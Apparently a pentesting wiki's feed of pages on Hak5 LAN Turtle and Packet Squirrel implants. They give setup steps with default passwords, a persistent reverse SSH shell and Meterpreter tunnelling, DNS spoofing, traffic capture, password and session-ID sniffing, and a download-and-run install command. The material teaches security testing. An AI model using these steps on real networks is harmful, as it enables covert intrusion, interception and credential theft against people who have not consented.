* https://docs.hak5.org/hc/en-us/categories/360000979313-LAN-Turtle&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6080</id>
		<title>Hak5 LAN Turtle</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6080"/>
		<updated>2021-03-04T12:14:15Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Setting up the LAN Turtle */  replaced the password with the correct password&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:LANTurtle.jpg |thumb|right|400px||LAN Turtle and Field Guide]]&lt;br /&gt;
The LAN turtle is a tool for penetration testers and system administrators disguised as a simple USB Ethernet adapter. It provides possibilities to perform remote access, man-in-the-middle and information gathering attacks. These functions are provided by the turtle modules which are preinstalled on the LAN turtle. The modules are based on the OpenWRT platform which allow users to add customized modules. The turtle itself is covert by a generic USB to Ethernet adapter and can therefore be placed unnoticed in IT infrastructures.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Setting up the LAN Turtle ===&lt;br /&gt;
&lt;br /&gt;
# Plug the LAN turtle into one of the USB ports of your computer.&lt;br /&gt;
# Your computer will get an 172.16.84.x address as soon as the startup sequence of the turtle finished. If not, then you have to statically configure an IP out of the 172.16.84.0/24 range.&lt;br /&gt;
# Connect to the turtle with &amp;lt;code&amp;gt;ssh root@172.16.84.1&amp;lt;/code&amp;gt; and enter the password &amp;lt;code&amp;gt;sh3llz&amp;lt;/code&amp;gt;&lt;br /&gt;
# The simplistic graphical shell interface will prompt you to change the password but the old one is also allowed.&lt;br /&gt;
# Then the LAN turtle can be configured and modules can be installed within the interface. &lt;br /&gt;
# If you end the interface you will be greeted with an normal Linux shell but you can open it again with the &amp;lt;code&amp;gt;turtle&amp;lt;/code&amp;gt; command&lt;br /&gt;
&lt;br /&gt;
=== Using the turtle modules ===&lt;br /&gt;
&lt;br /&gt;
The LAN turtle comes packed with pre-installed tools. Furthermore it is possible to program your own or download them from the internet and configure them with the module manager as well.&lt;br /&gt;
&lt;br /&gt;
[[File:LANTurtleModules.jpg|400px||LAN Turtle configuration shell interface]]&lt;br /&gt;
&lt;br /&gt;
==== AutoSSH ====&lt;br /&gt;
&lt;br /&gt;
AutoSSH is a service which provides persistent SSH connections. If an SSH session drops, it will be quickly re-established by AutoSSH. This service is typically used to provide a convenient and persistent reverse shell into the LAN Turtle on the standard SSH port 22 - though it may be configured with any standard SSH parameters to forward any arbitrary port.&lt;br /&gt;
*&amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; - The username and hostname (DNS or IP) separated by @ for which to establish the SSH connection.&lt;br /&gt;
*&amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; - The port number from which the remote server will bind.&lt;br /&gt;
*&amp;lt;code&amp;gt;listen port&amp;lt;/code&amp;gt; - The port number to which the remote port will bind.&lt;br /&gt;
&lt;br /&gt;
Example: Per the defaults, the remote server will bind its local port 2222 back to the LAN Turtle port 22. In this scenario one may establish a persistent connection to their LAN Turtle from this reverse shell by first connecting to the public server, and then from there establishing an SSH connection to port 2222.&lt;br /&gt;
&lt;br /&gt;
==== Cron ====&lt;br /&gt;
Cron is a job scheduler which can be used to start and stop modules at specific times or regular intervals using the &#039;start&#039; and &#039;stop&#039; commands.&lt;br /&gt;
&lt;br /&gt;
==== DNSSpoof ====&lt;br /&gt;
DNSSpoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks. For example, the IP address returned for a client lookup of the domain \&amp;quot;example.com\&amp;quot; can be replaced with that of the LAN Turtle itself, or a 3rd party server. In this scenario, the computer connected to the Internet through the LAN Turtle attempting to browse to this domain may be redirected to the spoofed IP.&lt;br /&gt;
&lt;br /&gt;
==== Keymanager ====&lt;br /&gt;
With this tool you can create RSA keypairs and copy them to the public server. This is needed when AutoSSH is configured.&lt;br /&gt;
&lt;br /&gt;
==== Meterpreter ====&lt;br /&gt;
This module deploys an persistent shell to the Metasploit Framework of an other Machine.&lt;br /&gt;
&lt;br /&gt;
==== Nmap-Scan ====&lt;br /&gt;
This module uses &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; for discovering running devices and their port of the current LAN network.&lt;br /&gt;
&lt;br /&gt;
==== OpenVPN ====&lt;br /&gt;
OpenVPN enables remote access the LAN Turtle and optionally the network on which it resides. It allows to send the captured data to your operating network.&lt;br /&gt;
&lt;br /&gt;
==== SSHFS====&lt;br /&gt;
SSHFS (Secure SHell FileSystem) is a file system for Linux (and other operating systems with a FUSE implementation, such as Mac OS X or FreeBSD) capable of operating on files on a remote computer using just a secure shell login on the remote computer. On the local computer where the SSHFS is mounted, the implementation makes use of the FUSE (Filesystem in Userspace) kernel module. The practical effect of this is that the end user can seamlessly interact with remote files being securely served over SSH just as if they were local files on his/her computer. On the remote computer the SFTP subsystem of SSH is used.&lt;br /&gt;
&lt;br /&gt;
==== URLSnarf ====&lt;br /&gt;
URLSnarf allows you to capture which websites were accessed by the plugged in computer. URLSnarf only works with HTTP webpages which are hard to find today.&lt;br /&gt;
&lt;br /&gt;
== Use Cases==&lt;br /&gt;
&lt;br /&gt;
The LAN turtle can be deployed in various use cases, which can be divided into three categories:&lt;br /&gt;
* remote access attacks with AutoSSH or OpenVPN&lt;br /&gt;
* man-in-the-middle attacks with URLSnarf or DNSSpoof&lt;br /&gt;
* information gathering with Nmap-Scan&lt;br /&gt;
&lt;br /&gt;
Remote access attacks are used to gain access to a private network from a remote place in order to start further attacks from the inside network. This makes it a lot more easier because the attack itself does not have to bypass a router or firewall. All the attacker needs is the pre-configured LAN turtle inside the network and a remote server on the internet. To perform a remote access, the LAN turtle builds up a tunnel to the remote server so the firewall cannot capture the traffic. Finally the attacker can access the LAN turtle through the tunnel from the remote server. This attack can be performed with the modules AutoSSH or OpenVPN.&lt;br /&gt;
&lt;br /&gt;
The LAN turtle also allows man-in-the-middle attacks, where the turtle can intercept the communication between two parties. To perform such an attack, the LAN turtle must be connected to an USB port of the victim host and to a network cable which connects the host to the internal LAN. Now the whole traffic of the victim host goes over the LAN turtle and can be logged or altered. An attacker can use URLSnarf or DNSSpoof to perform such an attack.&lt;br /&gt;
&lt;br /&gt;
The last use case is information gathering. The aim of this attack is to receive information about the topology, the hosts and the protocols of an internal network in order to perform further attacks. This can be done with the modules like Nmap-Scan.&lt;br /&gt;
&lt;br /&gt;
The following step-by-step instructions will outline how to configure the LAN turtle in order to perform the different types of attacks.&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with AutoSSH ===&lt;br /&gt;
In this example consider an internal network which is secured by a firewall and a public server in the internet controlled by the attacker.&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Generate RSA keypairs with Keymanager ====&lt;br /&gt;
# Open the Keymanager module and select &amp;lt;code&amp;gt;generate_key&amp;lt;/code&amp;gt;&lt;br /&gt;
# Select &amp;lt;code&amp;gt;copy_key&amp;lt;/code&amp;gt; and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; remote SSH server port (typically 22)&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; user on the remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;password&amp;lt;/code&amp;gt; password for the user on the remote host&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure AutoSSH ====&lt;br /&gt;
# Open AutoSSH and insert the following parameters:&lt;br /&gt;
#* &amp;lt;code&amp;gt;user@host&amp;lt;/code&amp;gt; user and host to establish the SSH tunnel&lt;br /&gt;
#* &amp;lt;code&amp;gt;remote port&amp;lt;/code&amp;gt; remote port to bind through the SSH tunnel (default 2222)&lt;br /&gt;
#* &amp;lt;code&amp;gt;local port&amp;lt;/code&amp;gt; local port to bind tunnel (default 22)&lt;br /&gt;
# Submit the changes and start AutoSSH (or enable it for autostart)&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Access LAN turtle from remote server ====&lt;br /&gt;
# Connect to the remote server&lt;br /&gt;
# Connect locally to the remote port of the AutoSSH configuration by &amp;lt;code&amp;gt;ssh root@localhost:2222&amp;lt;/code&amp;gt;&lt;br /&gt;
# You are now on the LAN turtle, continue with further attacks&lt;br /&gt;
&lt;br /&gt;
=== Man-in-the-middle attacks with DNSSpoof ===&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure the spoofhost file ====&lt;br /&gt;
# Open the DNSSpoof module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Add the DNS entries that the LAN turtle should spoof by entering the IP address and the spoofed DNS name&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Place the LAN turtle in the network ====&lt;br /&gt;
After configuring the spoofed hosts, place the LAN turtle on the victim computer by simply plugging the turtle into an USB port of the computer and the network cable into the LAN turtle.&lt;br /&gt;
&lt;br /&gt;
=== Information Gathering with nmap ===&lt;br /&gt;
As an example project we use the following modules:&lt;br /&gt;
* Cron to periodically start the attack&lt;br /&gt;
* SSHFS to save the caputred information in a file on the remote server&lt;br /&gt;
* Nmap-Scan to sniff the configuration and devices of the network&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure SSHFS ====&lt;br /&gt;
# Access the SSHFS module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; IP address of the remote server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; 22&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; the username&lt;br /&gt;
#* &amp;lt;code&amp;gt;path&amp;lt;/code&amp;gt; This can be left blank if you want to use the users home directory&lt;br /&gt;
# Start SSHFS and enable it for start up&lt;br /&gt;
&lt;br /&gt;
==== Step 2: nmap-scan ====&lt;br /&gt;
# Access the nmap-scan module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* target: &amp;lt;code&amp;gt;192.168.0.1-255&amp;lt;/code&amp;gt; (This may differ for our network)&lt;br /&gt;
#* logflie: &amp;lt;code&amp;gt;/sshfs/&amp;lt;/code&amp;gt;&lt;br /&gt;
#* use the desired attack profile&lt;br /&gt;
#* save the configuration with execute&lt;br /&gt;
&lt;br /&gt;
==== Step 3: cron job ====&lt;br /&gt;
# add in the con config &amp;lt;code&amp;gt;*/15 * * * * start nmap-scan&amp;lt;/code&amp;gt;&lt;br /&gt;
This line start an nmap-scan every 15 minutes.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[LAN Turtle]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000979313-LAN-Turtle&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6079</id>
		<title>Hak5 Packet Squirrel</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6079"/>
		<updated>2021-03-02T16:07:04Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Added the ispyintel payload&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:Packet Squirrel Connectors.jpg |thumb|right|400px||Packet Squirrel device]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel operates as an Ethernet Man in the Middle and comes  preloaded with three exploit scripts. These three attack modes are Logging Network Traffic, Spoofing DNS and OpenVPN Tunnel. These can also be modified and exchanged with other scripts. &lt;br /&gt;
The Packet Squirrel can also be combined with the [[Hak5 Cloud C2]], a command and control server specially for Hak5 devices.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
[[File:Hak5_Squirrel_version.jpg|thumb|right|400px||SSH connect]]&lt;br /&gt;
[[File:Hak5_Squirrel_spoofhost.jpg|thumb|right|400px||spoofhost file]]&lt;br /&gt;
[[File:Hak5_Squirrel_browser.jpg|thumb|right|400px||Spoofed browser warning]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel has an switch to choose between the three exploit payloads for logging the TCP dump, Using VPN Tunnelling and for DNS spoofing, or Arming Mode.&lt;br /&gt;
 &lt;br /&gt;
In &#039;&#039;&#039;Arming Mode&#039;&#039;&#039; (switch in 4th position, nearest to the USB port) you can easily access the device with ssh &amp;lt;code&amp;gt;root@172.16.32.1&amp;lt;/code&amp;gt; with the password &amp;lt;code&amp;gt;hak5squirrel&amp;lt;/code&amp;gt;. Therefore Packet Squirrel acts as DHCP server. If you don&#039;t get an IP address, manually configure an IP from the 172.16.32.0/24 network on your ethernet interface. Arming Mode is indicated by a blue blinking LED an allows to configure the different payloads.&lt;br /&gt;
&lt;br /&gt;
It is also possible to gain ssh access to the device during the attack modes with the IP address of the outgiong Ethernet interface as well.    &lt;br /&gt;
&lt;br /&gt;
==== Basic Cable Setup ====&lt;br /&gt;
&lt;br /&gt;
# Plug the victims Ethernet cable into the &amp;quot;Ethernet In&amp;quot; Port&lt;br /&gt;
# Plug the gateway Ethernet cable  into the &amp;quot;Ethernet Out&amp;quot; Port&lt;br /&gt;
# Power the device by plugging in the power cable&lt;br /&gt;
&lt;br /&gt;
==== Firmware Upgrade ====&lt;br /&gt;
&lt;br /&gt;
Shiped devices are installed with version 1.0, which can be seen in the VERSION file in the Packet Squirrel root folder. The current version 3.2 can be downloaded from the Hak5 website.&lt;br /&gt;
&lt;br /&gt;
The file has to be named upgrade-version.bin (where version stands for the version number) and copied to the root directory of an NTFS or EXT4 formatted USB drive.&lt;br /&gt;
&lt;br /&gt;
Plug in the USB drive in the Packet Squirrel and set the select switch to Arming Mode. Then power on the Packet Squirrel. &lt;br /&gt;
&lt;br /&gt;
The upgrade process needs 5 minutes and is indicated by a solid red or blue LED light. When the firmware upgrade is finished, Packet Squirrel reboots and goes in Arming Mode. Shown by a blud blinking LED. &lt;br /&gt;
&lt;br /&gt;
Then you can connect again with SSH and verify the new version, shown in Figure &amp;quot;SSH connect&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Payloads ==&lt;br /&gt;
&lt;br /&gt;
=== Logging Network Traffic ===&lt;br /&gt;
&lt;br /&gt;
This mode creates TCP/UDP dumps and saves them on the USB drive to analyse later on.&lt;br /&gt;
Just follow these easy steps:&lt;br /&gt;
&lt;br /&gt;
# A USB Stick with an NTFS file system needs to be plugged in the USB-A Port before the Squirrel is Powered up. &lt;br /&gt;
# Flip the first position (which is nearest to the micro USB power in).&lt;br /&gt;
# Connect the Ethernet cable of the victim into the Ethernet port, which is at the same side as the power in USB connector and Connect the Gateway Ethernet cable to the other Port.&lt;br /&gt;
# Plug the power cable in and wait the one minute long start up sequence. The device can be either powered by the victim machine or by an USB power bank.&lt;br /&gt;
# The data traffic will be captured, if the LED starts blinking Yellow. If otherwise the LED circles between red, green and blue, then the USB stick has the wrong file system.&lt;br /&gt;
# Stop the capturing process by pressing the Button. Then the device takes some seconds to write the tcpdum to the USB Storage. As soon as the LED glows red the saving process has ended and you are good to go.&lt;br /&gt;
# You can now analyse the captured pcap file, located in \loot\tcpdump with [[Wireshark]].&lt;br /&gt;
&lt;br /&gt;
After that, the connection trough the Packet Squirrel is shut down. To allow the client to connect to the network again, Packet Squirrel has to be rebooted.&lt;br /&gt;
&lt;br /&gt;
=== DNS Spoofing Mode ===&lt;br /&gt;
&lt;br /&gt;
This mode spoofs the client with DNS entries to redirect traffic to other IP addresses.&lt;br /&gt;
&lt;br /&gt;
# For this mode we have to start in arming mode (switch at fourth position)&lt;br /&gt;
# After gaining access with ssh we change to the DNS spoofing directory with &amp;lt;code&amp;gt;cd /payloads/switch2&amp;lt;/code&amp;gt;.&lt;br /&gt;
# There we can define the Spoofed domain names by editing the file spoofhost with &amp;lt;code&amp;gt;nano spoofhost&amp;lt;/code&amp;gt;.&lt;br /&gt;
# In the file add entrys like &amp;lt;code&amp;gt;address=/myspoofdomain.at/194.232.104.140&amp;lt;/code&amp;gt; as shown in figure &amp;quot;spoofhost file&amp;quot;. The example IP belongs to orf.at&lt;br /&gt;
# Unplug the Packet Squirrel and shift the switch to the second position.&lt;br /&gt;
# Plug it in and wait until the startup sequence is finished and the LED starts blinking yellow.&lt;br /&gt;
&lt;br /&gt;
By browsing to the spoofed domain, the request gets redirected to the given IP. As shown in figure &amp;quot;Spoofed browser warning&amp;quot; browsers show certificate alerts because the domain and certificate do not match. But this mode can still be used to attack other applications which use domains with no validation.&lt;br /&gt;
&lt;br /&gt;
=== OpenVPN Mode ===&lt;br /&gt;
[[File:Packet Squirrel VPN1.jpg |thumb|right|400px||OpenVPN Access Mode]]&lt;br /&gt;
[[File:Packet Squirrel VPN2.jpg |thumb|right|400px||OpenVPN Tunneling Mode]]&lt;br /&gt;
&lt;br /&gt;
The VPN payload implements VPN access mode and VPN tunnelling mode. &lt;br /&gt;
If you want to Setup your own OpenVPN (OVPN) server follow the instructions at the [https://docs.hak5.org/hc/en-us/articles/360010554013-OpenVPN-Payload hak5 webpage]. For the purpose of testing we use use an existing server from [https://www.freeopenvpn.org/en/ freeopenvpn.org]. &lt;br /&gt;
# Start by selecting the desired server and download the the OVPN access certificate.&lt;br /&gt;
# Set the Packet Squirrel in Arming Mode and connect to its shell&lt;br /&gt;
# Copy the certificate with &amp;lt;code&amp;gt;scp user@server:downloadfolder/filename.ovpn /root/payloads/switch3/config.ovpn&amp;lt;/code&amp;gt;&lt;br /&gt;
# Steer to the directory with &amp;lt;code&amp;gt; cd /root/payloads/switch3/&amp;lt;/code&amp;gt;&lt;br /&gt;
# Edit the config.ovpn at line 30 to &amp;lt;code&amp;gt;auth-user-pass credentials.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
# Add an credentials file with  &amp;lt;code&amp;gt; nano credentials.txt&amp;lt;/code&amp;gt; and add the two lines:&lt;br /&gt;
## &amp;lt;code&amp;gt;freeopenvpn&amp;lt;/code&amp;gt; &lt;br /&gt;
## &amp;lt;code&amp;gt;&amp;lt;the displayed password&amp;gt;&amp;lt;/code&amp;gt; &lt;br /&gt;
# Before starting the VPN we choose the VPN mode:&lt;br /&gt;
## Open the &amp;lt;code&amp;gt;payload.sh&amp;lt;/code&amp;gt; &lt;br /&gt;
## Set the &amp;lt;code&amp;gt;For_Clients=&amp;lt;/code&amp;gt;  to&lt;br /&gt;
### &amp;lt;code&amp;gt;0&amp;lt;/code&amp;gt; for Access Mode&lt;br /&gt;
### &amp;lt;code&amp;gt;1&amp;lt;/code&amp;gt; for Tunneling Mode&lt;br /&gt;
# Now set the Switch the the third Position and plug power out and in again&lt;br /&gt;
# You are good to go, if the yellow LED starts to flash after the boot up sequence  &lt;br /&gt;
==== Access Mode ====&lt;br /&gt;
&lt;br /&gt;
Access mode allows the squirrel to access the VPN Network via the Secure Shell&lt;br /&gt;
If the connection was established if the command &amp;lt;code&amp;gt;ifconfig tun0&amp;lt;/code&amp;gt; show the following output when it is issued at the Packet Squirrels Shell.&lt;br /&gt;
 tun0 &lt;br /&gt;
      Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00&lt;br /&gt;
      inet addr:192.168.231.245 P-t-P:192.168.231.245 Mask:255.255.255.0&lt;br /&gt;
      UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1&lt;br /&gt;
      RX packets:12 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
      TX packets:8 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
      collisions:0 txqueuelen:100&lt;br /&gt;
      RX bytes:1404 (1.3 KiB) TX bytes:608 (608.0 B)&lt;br /&gt;
&lt;br /&gt;
The Access Mode can be used to access an Private network that is used for testing and pen testing purposes like an honeypot virtual machine.&lt;br /&gt;
&lt;br /&gt;
==== Tunneling Mode ====&lt;br /&gt;
&lt;br /&gt;
The Tunnelling mode encapsulates all the traffic and sends it to the VPN Server, from where it is send to the internet. VPN Tunnelling allows users to disguise their IP address you can check your current IP address with [https://www.ipchicken.com ipchicken.com].&lt;br /&gt;
&lt;br /&gt;
You can also install an simple openVPN Server on a linux machine with&lt;br /&gt;
&amp;lt;code&amp;gt;wget https://git.io/vpn -O openvpn.sh &amp;amp;&amp;amp; bash openvpn.sh&amp;lt;/code&amp;gt;&lt;br /&gt;
and press Enter 6 times.&lt;br /&gt;
Then copy the generated client.ovpn file to Packet Squirrel in the /payload/switch3 folder and restart it with the switch on third position.&lt;br /&gt;
=== Meterpreter-via-SSH ===&lt;br /&gt;
This payload starts the Packet Squirrel in NAT mode and waits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over the tunnel.&lt;br /&gt;
The intent is to hide the meterpreter network traffic behind a legitimate SSH activity.&lt;br /&gt;
You can download this payload from the offical [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/remote-access/Meterpreter-via-SSH hak5 github].&lt;br /&gt;
==== Getting Started ====&lt;br /&gt;
Copy the playload to the Packet Squirrel into the desired switch folder. Now edit the scirpt to configure your server  options:&lt;br /&gt;
* SSH_USER - username on remote SSH server&lt;br /&gt;
* SSH_HOST - ip address of remote SSH Server&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; If you changed the default meterpreter port don&#039;t forget to change it on the metasploit side as well.&lt;br /&gt;
* MSF_PORT&lt;br /&gt;
&lt;br /&gt;
===== Generate SSH Key on Squirrel =====&lt;br /&gt;
Now you have to generate an ssh key-pair (just use default location and empty password) on your Packet Squirrel:&lt;br /&gt;
 root@squirrel:~# ssh-keygen&lt;br /&gt;
===== Allow Squirrel on SSH Server =====&lt;br /&gt;
Then you have to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH Server authorized file:&lt;br /&gt;
&lt;br /&gt;
 user@server:~# mkdir ~/.ssh&lt;br /&gt;
 user@server:~# echo &#039;paste id_rsa.pub contents inside this quote&#039; &amp;gt; ~/.ssh/authorized_keys&lt;br /&gt;
===== Run Metasploit with Resource =====&lt;br /&gt;
 msf@server:~# msfconsole -r server.rc&lt;br /&gt;
&lt;br /&gt;
==== LED Definitions ====&lt;br /&gt;
# Configure NETMODE&lt;br /&gt;
#* Solid Magenta&lt;br /&gt;
# Connect to SSH Server&lt;br /&gt;
#* SUCCESS - Blink Amber 5 Times&lt;br /&gt;
#* FAIL - Blink Red 2 Times&lt;br /&gt;
# Launch meterpreter&lt;br /&gt;
#* SUCESS - Blink Cyan 1 Time&lt;br /&gt;
#* FAIL - Blink Red 1 Time&lt;br /&gt;
&lt;br /&gt;
==== Hardening Recommendations ====&lt;br /&gt;
# Use an accout with limited privileges for SSH acces on the server.&lt;br /&gt;
# User a dedicated account for Packet Squirrel device (audit usage with SSH access logs).&lt;br /&gt;
# Disable PasswordAuthentication in sshd_config on the server.&lt;br /&gt;
&lt;br /&gt;
=== ISpyintel ===&lt;br /&gt;
This payload will automate gathering various recon data on whatever passes between it&#039;s Ethernet ports. You can download this payload from the [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/sniffing/ispyintel official hak5 github].&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039;This payload requires a usb stick to store loot.&lt;br /&gt;
==== Setup ====&lt;br /&gt;
# Edit the config variables at the top. The main variables are:&lt;br /&gt;
## &amp;lt;code&amp;gt;lootPath=&amp;quot;/mnt/loot/intel&amp;quot;  # Path to loot&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;mode=&amp;quot;TRANSPARENT&amp;quot;          # Network mode we want to use&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;interface=&amp;quot;br-lan&amp;quot;          # Interface to listen on&amp;lt;/code&amp;gt;&lt;br /&gt;
# Copy payload.sh into the ~/payloads/switch folder you wish to deploy on.&lt;br /&gt;
# Connect into a target machine with access to the LAN.&lt;br /&gt;
# Set switch to the spot and power up.&lt;br /&gt;
# Leave, get coffee, take a nap while everything is recorded and parsed for future use.&lt;br /&gt;
# When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.&lt;br /&gt;
# When all is done the LED will just go blank. It is now safe to unplug and go about your day.&lt;br /&gt;
&lt;br /&gt;
==== Tasks that are started ====&lt;br /&gt;
* tcpdump - records every packet that was send and received&lt;br /&gt;
* urlsnarf - collects all websites that were visited&lt;br /&gt;
* dsniff - attempts to acquire passwords and what not&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common password fields&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common session id fields&lt;br /&gt;
* log.txt - logs the progress of the payload for troubleshooting&lt;br /&gt;
&lt;br /&gt;
==== Clean Up ====&lt;br /&gt;
Once the button is pressed the payload will automatically parse the TCPDump log file for the following items and store the results in seperate files.&lt;br /&gt;
As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.&lt;br /&gt;
* ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains&lt;br /&gt;
* maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.&lt;br /&gt;
=== Creating your own Payloads ===&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel allows us to create our own attack payloads by loading them to the USB stick and naming them Switch1 to Switch3.&lt;br /&gt;
It allows as to create payload in python, bash or PHP. For Python and Bash it is important to use the interpreter directive Python: &amp;lt;code&amp;gt;#!/usr/bin/python&amp;lt;/code&amp;gt;, bash: &amp;lt;code&amp;gt;#!/usr/bin/bash&amp;lt;/code&amp;gt;.&lt;br /&gt;
Bash scripts can access the following pre-installed tools:&lt;br /&gt;
openvpn, autossh, tcpdump, meterpreter-https, cron, nmap, ncat-ssl, ncat, sshfs, tcpdump and wget&lt;br /&gt;
&lt;br /&gt;
The featured Squirrel Script offers the following additional commands:&lt;br /&gt;
&lt;br /&gt;
* NETMODE&lt;br /&gt;
specifies which network mode Packet Sqirrel uses and how traffic is routed&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Command !! Description&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE BRIDGE || Creates a bridge between the IN and OUT ehternet interface, with an own IP address for Packet Sqirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE TRANSPARENT || Also creates a bridge between the interfaces but with no own IP address&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE NAT || Packet Squirrel gets an IP address from the target network, the client gets an IP from Packet Squirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE VPN || same es NAT with VPN interface for client tunneling&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE CLONE || Clones the MAC address from the target client and uses it to connect to the LAN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* LED&lt;br /&gt;
with this command the multi-color LED can be controlled &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Possible configurations !! Description&lt;br /&gt;
|-&lt;br /&gt;
| LED Colors || red, green, blue, yellow, cyan, magenta, white&lt;br /&gt;
|-&lt;br /&gt;
| LED Patterns || SOLID, SLOW, FAST, SINGLE, DOUBLE, TRIPLE, SUCCESS, 1-10000&lt;br /&gt;
|-&lt;br /&gt;
| LED State || SETUP, FAIL, ATTACK, STAGE, SPECIAL, CLEANUP, FINISH&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* BUTTON&lt;br /&gt;
The BUTTON command pauses the paylpoad until the hardware button is pressed or a specified time has passed&lt;br /&gt;
&lt;br /&gt;
* SWITCH&lt;br /&gt;
The SWITCH command returns the current position of the hardware payload selection switch. Output is &amp;quot;switch1&amp;quot;, &amp;quot;switch2&amp;quot;, &amp;quot;switch3&amp;quot; or &amp;quot;switch4&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
==== Example ====&lt;br /&gt;
[[File:Hak5 C2 start.jpg |thumb|right|400px||C2 server start]]&lt;br /&gt;
[[File:Hak5 c2 dashboard.jpg |thumb|right|400px||C2 Dashboard]]&lt;br /&gt;
[[File:Hak5 c2 sqirrel.jpg |thumb|right|400px||C2 Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
Here is an example for the usage of Squirrel Script.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Title: Caternet&lt;br /&gt;
# Author: Hak5Darren&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Description: Forwards all traffic to local webserver hosting cat photos.&lt;br /&gt;
# Props: In loving memory of Hak5Kerby&lt;br /&gt;
&lt;br /&gt;
LED SETUP&lt;br /&gt;
NETMODE NAT&lt;br /&gt;
echo &amp;quot;address=/#/172.16.32.1&amp;quot; &amp;gt; /tmp/dnsmasq.address&lt;br /&gt;
/etc/init.d/dnsmasq restart&lt;br /&gt;
&lt;br /&gt;
LED ATTACK&lt;br /&gt;
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53&lt;br /&gt;
python -m SimpleHTTPServer 80&lt;br /&gt;
